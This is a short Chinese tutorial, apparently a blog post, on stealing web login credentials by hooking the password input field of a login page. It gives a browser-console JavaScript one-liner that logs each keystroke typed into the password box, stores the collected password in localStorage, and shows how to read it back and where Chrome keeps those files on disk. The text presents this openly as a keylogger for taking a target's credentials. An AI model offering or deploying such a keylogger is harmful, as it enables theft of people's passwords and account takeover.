HTML挂钩窃取 WEB 程序凭据
通过挂钩HTML中的输入字段以创建一个简单的键盘记录器来窃取目标主机的 WEB 程序登录凭据。
因为所有HTML元素都可以各种类型的事件,并在事件发生时执行代码。
首先,我们打开网页的登录页面,并在控制台键入以下代码:
t=""; $('input[type="password"]').onkeypress = function (e) { t+=e.key; console.log(t); localStorage.setItem("pw", t); }
当在password字段输入内容时,将会在控制台下方显示输入的内容:
当需要再次查看时,可以通过在控制台下输入以下代码来加载之前的password字段的内容:
localStorage.pw
或者打开控制台——应用——本地存储也可查看:
在本地磁盘中,该localStorage的日志信息*.log会存储在C:\Users\apt-i\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\目录下:
